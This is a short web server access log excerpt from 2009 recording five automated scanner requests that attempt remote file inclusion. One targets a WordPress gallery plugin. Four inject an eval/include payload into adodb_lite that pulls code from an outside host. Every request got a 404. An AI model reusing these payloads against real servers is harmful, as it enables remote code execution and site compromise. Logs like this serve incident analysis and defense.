123.242.165.138 - - [02/Aug/2009:01:52:32 -0400] "GET /logs/error_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.suntalent.com.tw/appserv/id??? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
78.110.50.132 - - [02/Aug/2009:01:53:49 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:53:49 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:53:49 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.814"
78.110.50.132 - - [02/Aug/2009:01:53:49 -0400] "GET /logs/access_log.Q109070300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://d2ecars.com//idste.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.814"
